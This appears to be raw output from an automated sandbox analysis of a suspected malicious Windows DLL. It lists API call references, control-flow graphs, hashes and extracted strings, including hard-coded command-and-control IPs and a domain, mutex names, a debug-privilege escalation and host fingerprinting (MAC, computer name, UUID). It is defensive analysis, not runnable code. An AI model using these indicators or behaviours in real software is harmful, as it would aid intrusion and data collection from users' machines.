                                                      APIs
                                                      • htons.WS2_32(?), ref: 1001A3C7
                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 1001A3E0
                                                      • WSAGetLastError.WS2_32 ref: 1001A3F0
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001A426
                                                      • inet_ntoa.WS2_32(?), ref: 1001A434
                                                      • _wprintf.LIBCMT ref: 1001A466
                                                      • connect.WS2_32(?,?,00000010), ref: 1001A4AA
                                                      • inet_addr.WS2_32(114.114.114.114), ref: 1001A51E
                                                        • Part of subcall function 10016D1B: __EH_prolog.LIBCMT ref: 10016D20
                                                        • Part of subcall function 10016D1B: _sprintf.LIBCMT ref: 10016D94
                                                      • inet_addr.WS2_32 ref: 1001A570
                                                      • inet_addr.WS2_32(47.76.212.112), ref: 1001A5A9
                                                      • inet_addr.WS2_32(47.76.187.31), ref: 1001A5C1
                                                      • inet_addr.WS2_32(47.76.24.248), ref: 1001A5D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: inet_addr$ErrorH_prologLast_sprintf_wprintfconnecthtonsinet_ntoasetsockoptsocket
                                                      • String ID: 114.114.114.114$47.76.187.31$47.76.212.112$47.76.24.248$DNSLookup result (%s):$Error (%s) in line: %d in file: %s$connect ip:%s $inc\http\Socket.cpp$value.length() > 0
                                                      • API String ID: 1519317838-3972532071
                                                      • Opcode ID: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
                                                      • Instruction ID: 7b49e0120e11b4ab11456f49e9eb18eb1437e29c51d74eb201d297852d276499
                                                      • Opcode Fuzzy Hash: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
                                                      • Instruction Fuzzy Hash: A6717C70508741AFD724CF69C885A6EB7F5FF89310F508A2EF5A6C62A1D731E984CB12

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001A6DD
                                                        • Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
                                                        • Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5
                                                        • Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
                                                        • Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273
                                                      • _sprintf.LIBCMT ref: 1001A741
                                                        • Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
                                                        • Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C
                                                        • Part of subcall function 100168F4: __EH_prolog.LIBCMT ref: 100168F9
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7B4
                                                      • GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7BC
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7DF
                                                      • GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7E7
                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A815
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A818
                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83E
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?), ref: 1001A852
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A87C
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A893
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A89A
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8AD
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8B5
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8BD
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseHandleRelease$CreateErrorH_prologLast$Open_sprintf$ComputerGuidNameSleep_fprintf_memmove
                                                      • String ID: %s%s$13a.dh7483y.com$jkdi%42&!#
                                                      • API String ID: 1969416865-4094921056
                                                      • Opcode ID: 77fc53505133d0cee0eb71986c5095c13c0397c5f280e46dd93d8412a04ec331
                                                      • Instruction ID: a8d946be910b25d93d618c846ade29e6a59fa686ccbc9f3ba0165ef815e5f331
                                                      • Opcode Fuzzy Hash: 77fc53505133d0cee0eb71986c5095c13c0397c5f280e46dd93d8412a04ec331
                                                      • Instruction Fuzzy Hash: 7D518171D04268EFEB11DBA4CC95FEE7BB8EF04340F440029F505A7192DB74AA89CBA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 439 1001c9a2-1001c9cb 440 1001c9d1-1001cab0 htons inet_addr setsockopt call 10039700 call 10002d15 call 1000191f call 10003256 call 100022f0 439->440 441 1001d12e-1001d144 439->441 452 1001d022-1001d026 440->452 453 1001cab5-1001cb02 Sleep call 10039700 call 1001e307 452->453 454 1001d02c 452->454 464 1001cb05-1001cb0a 453->464 456 1001d0fd-1001d100 454->456 458 1001d102-1001d10a closesocket 456->458 459 1001d10d-1001d129 call 10001d92 * 3 456->459 458->459 459->441 464->464 466 1001cb0c-1001cb2d sendto 464->466 466->452 468 1001cb33 466->468 470 1001ce6b-1001cea6 call 10039700 recvfrom 468->470 473 1001cb38-1001cbcd call 1000191e inet_ntoa call 10001d63 call 1001e275 call 10002e39 call 1001e275 call 10002e39 call 10034050 470->473 474 1001ceac-1001ceb7 WSAGetLastError 470->474 511 1001cc2a-1001cc76 call 10002d15 call 1000191f call 10003256 473->511 512 1001cbcf-1001cbf5 473->512 474->452 476 1001cebd-1001cee9 call 1001df0d 474->476 482 1001d011 476->482 483 1001ceef-1001cf12 call 10039ac8 476->483 485 1001d015-1001d01d call 10001d92 482->485 491 1001cf18-1001cf1b 483->491 492 1001cfff-1001d006 483->492 485->452 494 1001cf21 491->494 495 1001d0f4 491->495 496 1001d0d7-1001d0db 492->496 497 1001d00c-1001d00d 492->497 494->482 499 1001d0f8 call 10001d92 495->499 496->495 500 1001d0dd-1001d0e3 496->500 497->482 499->456 501 1001d0e5-1001d0e9 500->501 502 1001d0eb-1001d0ed 500->502 505 1001d0ef call 10006146 501->505 502->505 505->495 531 1001cc7d-1001cc81 511->531 514 1001cbfd-1001cc01 512->514 516 1001cc03-1001cc05 514->516 517 1001cc1d-1001cc1f 514->517 520 1001cc07-1001cc0d 516->520 521 1001cc19-1001cc1b 516->521 518 1001cc22-1001cc24 517->518 518->511 522 1001cf26-1001cf55 call 1000191e 518->522 520->517 524 1001cc0f-1001cc17 520->524 521->518 529 1001d031-1001d035 522->529 530 1001cf5b 522->530 524->514 524->521 532 1001d037-1001d03d 529->532 533 1001d04e-1001d06a call 10001d92 * 2 529->533 534 1001cf5c-1001cf78 call 10001d92 * 2 530->534 535 1001cc83-1001cc85 531->535 536 1001cc9d-1001cc9f 531->536 538 1001d045-1001d047 532->538 539 1001d03f-1001d043 532->539 533->499 534->485 542 1001cc87-1001cc8d 535->542 543 1001cc99-1001cc9b 535->543 537 1001cca2-1001cca4 536->537 544 1001cca6 537->544 545 1001ccaa-1001cd13 call 10002d15 call 1000191f call 10003256 call 10002d15 call 1000191f call 10003256 537->545 546 1001d049 call 10006146 538->546 539->546 542->536 549 1001cc8f-1001cc97 542->549 543->537 544->545 567 1001cd19-1001cd27 545->567 568 1001cf7d-1001cf8b 545->568 546->533 549->531 549->543 569 1001cd2e-1001cd32 567->569 570 1001cf92-1001cf96 568->570 573 1001cd34-1001cd36 569->573 574 1001cd4e-1001cd50 569->574 571 1001cfb2-1001cfb4 570->571 572 1001cf98-1001cf9a 570->572 579 1001cfb7-1001cffa call 1000191e call 10001d92 * 3 571->579 575 1001cf9c-1001cfa2 572->575 576 1001cfae-1001cfb0 572->576 577 1001cd38-1001cd3e 573->577 578 1001cd4a-1001cd4c 573->578 580 1001cd53-1001cd55 574->580 575->571 581 1001cfa4-1001cfac 575->581 576->579 577->574 582 1001cd40-1001cd48 577->582 578->580 579->534 584 1001cd57-1001cd6e 580->584 585 1001cda8-1001cdcd call 10002d15 580->585 581->570 581->576 582->569 582->578 588 1001cd75-1001cd79 584->588 593 1001cdd9-1001cdf1 call 10001d92 585->593 594 1001cdcf-1001cdd4 call 10001e92 585->594 591 1001cd95-1001cd97 588->591 592 1001cd7b-1001cd7d 588->592 598 1001cd9a-1001cd9c 591->598 596 1001cd91-1001cd93 592->596 597 1001cd7f-1001cd85 592->597 606 1001d0b1-1001d0d2 call 10001d92 * 3 593->606 607 1001cdf7-1001ce1b call 1000c213 call 10010dd2 593->607 594->593 596->598 597->591 602 1001cd87-1001cd8f 597->602 598->585 603 1001cd9e-1001cda2 598->603 602->588 602->596 603->568 603->585 606->533 619 1001ce21-1001ce66 call 10001d92 * 6 607->619 620 1001d06f-1001d08e call 10001e92 607->620 619->470 627 1001d090-1001d09d 620->627 628 1001d09f-1001d0aa 620->628 630 1001d0ac call 10006376 627->630 628->630 630->606
                                                      APIs
                                                      • htons.WS2_32(00005CE3), ref: 1001C9DE
                                                      • inet_addr.WS2_32(255.255.255.255), ref: 1001C9EE
                                                      • setsockopt.WS2_32 ref: 1001CA0D
                                                        • Part of subcall function 100022F0: gethostname.WS2_32(?,00000100), ref: 1000230B
                                                      • Sleep.KERNELBASE(0000000A), ref: 1001CAB7
                                                      • sendto.WS2_32(?,?,?,00000000,?,?), ref: 1001CB24
                                                      • recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001CE9D
                                                      • WSAGetLastError.WS2_32(?,?,00000000,?,?,?,?,?,bck,00000000,?), ref: 1001CEAC
                                                      • _memcmp.LIBCMT ref: 1001CF08
                                                      • closesocket.WS2_32(?), ref: 1001D104
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastSleep_memcmpclosesocketgethostnamehtonsinet_addrrecvfromsendtosetsockopt
                                                      • String ID: 127.0.0.1$255.255.255.255$[%d]Find szIPAddr:%s.Host:%s is not same.$bck$bck_w$bckhst$recvfrom compare is faild szIPAddr:%s.res:%d bWaitStart:%d$serch recvfrom :%s.
                                                      • API String ID: 2742795110-796237128
                                                      • Opcode ID: 7371ef3f4562dd1ebe9a4f35494abf6c80efcf0c0e4d606efb9f3fa8ef3634a2
                                                      • Instruction ID: 71a6e8450f25750b8eb19ae326af7dcd83f814d640ad7f3094fd8df69461fb78
                                                      • Opcode Fuzzy Hash: 7371ef3f4562dd1ebe9a4f35494abf6c80efcf0c0e4d606efb9f3fa8ef3634a2
                                                      • Instruction Fuzzy Hash: 5D12A335108385AEE331DB20C891FEBB7E9EF95344F50491EE5CA86092DB71E989CB53

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 639 10011c4e-10011cc3 call 1004eb10 call 100021eb 644 10011ce1-10011d74 call 100022f0 call 10015fd9 call 1001bc82 call 10002d5e call 10001d92 call 10002eeb call 10008f12 call 10008fc0 639->644 645 10011cc5-10011cdc call 100022c4 * 2 639->645 665 10011d76-10011d7a 644->665 666 10011d7c-10011d83 644->666 645->644 665->665 665->666 667 10011d85-10011d89 666->667 667->667 668 10011d8b-10011db6 call 10009053 667->668 671 10011db8-10011dbc 668->671 672 10011dbe-10011dc5 668->672 671->671 671->672 673 10011dc7-10011dcb 672->673 673->673 674 10011dcd-10011def call 10009053 673->674 677 10011df1-10011df5 674->677 678 10011df7-10011dfe 674->678 677->677 677->678 679 10011e00-10011e04 678->679 679->679 680 10011e06-10011e22 call 10009053 679->680 683 10011e24 680->683 684 10011e26-10011e2b 680->684 683->684 685 10011e33-10011e3a 684->685 686 10011e2d-10011e31 684->686 687 10011e3c-10011e40 685->687 686->685 686->686 687->687 688 10011e42-10011e5e call 10009053 687->688 691 10011e60 688->691 692 10011e62-10011e67 688->692 691->692 693 10011e69-10011e6d 692->693 694 10011e6f-10011e76 692->694 693->693 693->694 695 10011e78-10011e7c 694->695 695->695 696 10011e7e-10011e95 call 10009053 695->696 699 10011e97-10011e9b 696->699 699->699 700 10011e9d-10011eb5 call 10009f0d 699->700 703 10011eb7-10011ebb 700->703 703->703 704 10011ebd-10011ec4 703->704 705 10011ec6-10011eca 704->705 705->705 706 10011ecc-10011ee3 call 10009053 705->706 709 10011ee5-10011ee9 706->709 709->709 710 10011eeb-10011f5d call 10009f0d call 10001d63 * 2 709->710 717 10011f63 710->717 718 10012138-10012231 call 10009005 call 10008ee2 call 10009f88 call 10008ebb call 10001d63 call 10033984 call 10032fe8 call 10033984 call 10032fe8 call 10001d92 * 2 call 10008f9c call 10001d92 * 3 710->718 719 10011f66-10011f86 717->719 721 10011f88 719->721 722 10011f8a-10011f8f 719->722 721->722 724 10011f91-10011f95 722->724 725 10011f97-10011f99 722->725 724->724 724->725 728 10011f9e-10011fa2 725->728 728->728 730 10011fa4-10011fbf call 10009053 728->730 736 10011fc1-10011fc5 730->736 736->736 738 10011fc7-10011fe3 call 10009f0d 736->738 744 10011fe5-10011fe9 738->744 744->744 745 10011feb-10012007 call 10009f0d 744->745 752 10012009-1001200d 745->752 752->752 754 1001200f-10012038 call 10009f0d 752->754 760 1001203a 754->760 761 1001203c-10012041 754->761 760->761 763 10012043-10012047 761->763 764 10012049-1001204b 761->764 763->763 763->764 766 10012050-10012054 764->766 766->766 768 10012056-10012071 call 10009053 766->768 774 10012073-10012077 768->774 774->774 775 10012079-10012095 call 10009f0d 774->775 782 10012097-1001209b 775->782 782->782 783 1001209d-100120c9 call 1000a371 782->783 786 100120cb 783->786 787 100120cd-100120d2 783->787 786->787 788 100120d4-100120d8 787->788 789 100120da-100120dc 787->789 788->788 788->789 790 100120e1-100120e5 789->790 790->790 791 100120e7-10012130 call 10009053 call 100090a4 790->791 791->719 796 10012136 791->796 796->718
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10011C53
                                                        • Part of subcall function 100021EB: GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209
                                                      • _free.LIBCMT ref: 100121B7
                                                      • _free.LIBCMT ref: 100121CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AdaptersH_prologInfo
                                                      • String ID: 1.0.0.64$c_post_id$client_id$d_plat$err_cdn$err_code$err_info$host$is_down$is_exe$list$mac$plug_id$sys_res$uuid$version
                                                      • API String ID: 2722462171-1692044417
                                                      • Opcode ID: 3b51da644e9a541e946d01bca52a5af4cba8a090a7a3e514908eb9f9f3a008e7
                                                      • Instruction ID: f90d9264f1c1e6498c44510829453a28db1729ed47331b4b3d70f0524b460866
                                                      • Opcode Fuzzy Hash: 3b51da644e9a541e946d01bca52a5af4cba8a090a7a3e514908eb9f9f3a008e7
                                                      • Instruction Fuzzy Hash: 3B02D570910199AEEB19CB74CC45FEEBBB9EF46340F0441ACE406DB196DB70AE85CB60

                                                      Control-flow Graph

                                                      APIs
                                                      • OutputDebugStringA.KERNEL32(---------------->is null!!!!!!!!!!!!!!!!), ref: 1001A9EB
                                                      • CreateMutexA.KERNEL32(00000000,00000000,null1), ref: 1001A9FA
                                                      • Sleep.KERNEL32(000001F4,00000069,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001AB66
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0001A91C,00000000,00000000,?), ref: 1001AB89
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 1001ABD0
                                                      • CloseHandle.KERNEL32 ref: 1001ABD8
                                                      • ReleaseMutex.KERNEL32 ref: 1001ABE0
                                                      • CloseHandle.KERNEL32 ref: 1001ABE8
                                                      • Sleep.KERNEL32(000001F4), ref: 1001AC02
                                                      • TerminateThread.KERNEL32(0000024C,00000000), ref: 1001AC13
                                                      • CloseHandle.KERNEL32 ref: 1001AC1F
                                                        • Part of subcall function 1001B976: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
                                                        • Part of subcall function 1001B976: GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A
                                                        • Part of subcall function 1000C15A: __vsnprintf_s.LIBCMT ref: 1000C194
                                                        • Part of subcall function 1000C15A: _memmove.LIBCMT ref: 1000C1E9
                                                        • Part of subcall function 1001C2A5: GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
                                                        • Part of subcall function 1001C2A5: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
                                                        • Part of subcall function 1001C2A5: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
                                                        • Part of subcall function 1001C2A5: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
                                                        • Part of subcall function 1001C2A5: CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle_malloc$CreateMutex$ProcessReleaseSleepThreadToken$AdjustCurrentDebugErrorFileLastLookupMappingOpenOutputPrivilegePrivilegesStringTerminateValue__vsnprintf_s_memmove
                                                      • String ID: ->FILE_APP mutex is existing$ ->FILE_APP today is runing$---------------->is null!!!!!!!!!!!!!!!!$555prc4xnupd$CheckApp:%d text:%s$Input param:%s$get:%s$null1
                                                      • API String ID: 3952390217-1909696795
                                                      • Opcode ID: d30990bd2dcfa78e3e7c9b7b5930c09dcae62470eb650fd5a8a75b460fc45789
                                                      • Instruction ID: b9528a95e4524d17b4f6d8a13efaef8769615a14464e7c918a77bf7d60e1a239
                                                      • Opcode Fuzzy Hash: d30990bd2dcfa78e3e7c9b7b5930c09dcae62470eb650fd5a8a75b460fc45789
                                                      • Instruction Fuzzy Hash: 3B61F475504350AFE710EF25CC89EAF7BE9EF85350F00052EF545961A2DB70EA84CBA2

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10015714
                                                        • Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
                                                        • Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 100157C1
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015839
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10015843
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001586A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1001586E
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 10015899
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 100158AE
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158B5
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158CA
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158D8
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E0
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
                                                      • String ID: %s%s%saz$%^$%@#sa$EEFsd2$2#b.dg7983%1io$gnbc344asd$m
                                                      • API String ID: 2639461599-1078873301
                                                      • Opcode ID: 07fedbff580469d4b17fa7fa6d80ea615dcd76a19c10074564fc3731cc07f228
                                                      • Instruction ID: db7850e3fd9d69c0528ec08768e9ac04465b1e639cfc869010542aedb86768d4
                                                      • Opcode Fuzzy Hash: 07fedbff580469d4b17fa7fa6d80ea615dcd76a19c10074564fc3731cc07f228
                                                      • Instruction Fuzzy Hash: F0615FB1D00228EFEB11DFA4CC91ADEB7BDFF18250F54406AE506A7152DB70AA84CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 919 1001d388-1001d3b1 920 1001d6c0-1001d6d6 919->920 921 1001d3b7-1001d412 call 10002d15 call 1000191f call 10003256 call 10002d15 call 1000191f call 10003256 919->921 934 1001d418 921->934 935 1001d6ae-1001d6bb call 10001d92 * 2 921->935 936 1001d41b-1001d438 call 100169ae socket 934->936 935->920 942 1001d44a-1001d4e5 htons setsockopt * 3 sendto 936->942 943 1001d43a-1001d445 WSAGetLastError 936->943 942->943 945 1001d4eb-1001d50e call 10039700 942->945 944 1001d69e-1001d6a8 Sleep 943->944 944->935 944->936 948 1001d514-1001d54e call 10039700 recvfrom 945->948 949 1001d676-1001d699 closesocket 945->949 952 1001d670 WSAGetLastError 948->952 953 1001d554-1001d564 inet_ntoa 948->953 949->944 952->949 954 1001d567-1001d56c 953->954 954->954 955 1001d56e-1001d573 954->955 956 1001d579-1001d590 955->956 957 1001d658-1001d668 Sleep 955->957 958 1001d591-1001d595 956->958 957->948 959 1001d66e 957->959 960 1001d597-1001d599 958->960 961 1001d5af-1001d5b1 958->961 959->949 962 1001d5ab-1001d5ad 960->962 963 1001d59b-1001d5a1 960->963 964 1001d5b4-1001d5b6 961->964 962->964 963->961 965 1001d5a3-1001d5a9 963->965 964->957 966 1001d5bc-1001d5d0 964->966 965->958 965->962 967 1001d5d2 966->967 968 1001d61a-1001d653 call 10001d63 call 10008baf call 10001d92 966->968 970 1001d5d4-1001d5dd 967->970 968->957 972 1001d5e1 970->972 973 1001d5df 970->973 975 1001d5e5-1001d5e9 972->975 973->972 977 1001d605-1001d607 975->977 978 1001d5eb-1001d5ed 975->978 981 1001d60a-1001d60c 977->981 979 1001d601-1001d603 978->979 980 1001d5ef-1001d5f5 978->980 979->981 980->977 983 1001d5f7-1001d5ff 980->983 984 1001d655 981->984 985 1001d60e-1001d618 981->985 983->975 983->979 984->957 985->968 985->970
                                                      APIs
                                                        • Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001D429
                                                      • WSAGetLastError.WS2_32 ref: 1001D43A
                                                      • htons.WS2_32(?), ref: 1001D457
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 1001D47C
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001D49C
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001D4B4
                                                      • sendto.WS2_32(00000000,?,?,00000000,000000FF,00000010), ref: 1001D4DC
                                                      • recvfrom.WS2_32(00000000,?,00000400,00000000,?,?), ref: 1001D545
                                                      • inet_ntoa.WS2_32(?), ref: 1001D558
                                                      • Sleep.KERNEL32(0000000A), ref: 1001D65A
                                                      • closesocket.WS2_32(00000000), ref: 1001D693
